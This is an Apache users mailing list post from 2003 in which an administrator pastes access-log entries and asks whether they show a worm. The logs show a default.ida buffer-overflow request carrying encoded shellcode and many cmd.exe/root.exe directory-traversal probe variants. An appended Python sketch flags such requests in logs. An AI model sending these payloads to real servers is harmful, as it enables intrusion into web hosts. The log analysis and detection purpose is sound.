httpd-users mailing list archives

From "John Doumani" <fug...@attbi.com>
Subject [users@httpd] strange hits being logged -Worm?
Date Tue, 08 Apr 2003 23:41:20 GMT
Hello,

I have recently started seeing these lines of code repeated in my log files
for each virtual host. Is this a worm or some other attack on my server?

If so, what is the best way to protect the server from attack?

John


12.210.8.252 - - [07/Apr/2003:15:21:08 -0700] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u
9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078
%u0000%u00=a  HTTP/1.0" 404 -
12.210.23.223 - - [07/Apr/2003:15:58:39 -0700] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u
9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078
%u0000%u00=a  HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:05 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:05 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:06 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:06 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:07 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:08 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:08 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:10 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304
12.210.0.150 - - [07/Apr/2003:16:16:10 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304
12.210.0.150 - - [07/Apr/2003:16:16:10 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:11 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.8.252 - - [07/Apr/2003:16:18:19 -0700] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u909
0%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0
000%u00=a  HTTP/1.0" 404 -


<<><<>><<>><<>><<>><<>>
John e Doumani
fuguma@attbi.com

~Navigating the Web long before the Internet~



---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
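
A triage sketch for access-log entries like the ones in the message above, added here as an example and not part of the original post. The requested paths (`default.ida`, `root.exe`, `/winnt/system32/cmd.exe`) are IIS/Windows paths, so the check that matters on an Apache host is whether any such request was answered with something other than a 4xx status. The signature labels, the 192.0.2.x addresses and the final 200 line are constructed for illustration.

```python
import re
from collections import Counter

# Apache common log format: host ident user [time] "method path proto" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)$')

# Hypothetical labels; the patterns follow the request shapes in the log excerpt.
SIGNATURES = [
    ("ida-overflow", re.compile(r'^/default\.ida\?X{20,}.*%u[0-9a-f]{4}', re.I)),
    ("root.exe-probe", re.compile(r'/root\.exe\?/c\+', re.I)),
    ("cmd.exe-probe", re.compile(r'/winnt/system32/cmd\.exe\?/c\+', re.I)),
]

# Constructed sample: unwrapped lines modelled on the excerpt, documentation IPs.
SAMPLE = [
    '192.0.2.10 - - [07/Apr/2003:15:21:08 -0700] "GET /default.ida?' + "X" * 224
    + '%u9090%u6858%ucbd3%u7801%u00=a  HTTP/1.0" 404 -',
    '192.0.2.20 - - [07/Apr/2003:16:16:05 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -',
    '192.0.2.20 - - [07/Apr/2003:16:16:07 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -',
    '192.0.2.20 - - [07/Apr/2003:16:16:10 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304',
    '192.0.2.30 - - [07/Apr/2003:16:20:00 -0700] "GET /index.html HTTP/1.0" 200 1042',
    '192.0.2.40 - - [07/Apr/2003:16:21:00 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 512',
]

def classify(path):
    """Return the label of the first signature matching the request path, else None."""
    for name, rx in SIGNATURES:
        if rx.search(path):
            return name
    return None

def triage(lines):
    """Group probe hits by source IP and record any probe that was not rejected."""
    report = {}
    for line in lines:
        m = LOG_RE.match(line.strip())
        label = classify(m.group(4)) if m else None
        if label is None:
            continue  # unparseable line or ordinary traffic
        ip, status = m.group(1), m.group(5)
        entry = report.setdefault(ip, {"hits": Counter(), "served": []})
        entry["hits"][label] += 1
        if not status.startswith("4"):  # a non-4xx answer to a probe needs a closer look
            entry["served"].append((status, m.group(4)))
    return report

if __name__ == "__main__":
    for ip, entry in triage(SAMPLE).items():
        print(ip, dict(entry["hits"]), "INVESTIGATE" if entry["served"] else "rejected")
```

Mail clients wrap long log lines, as in the excerpt above, so run this against the log file itself rather than text pasted from an e-mail.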

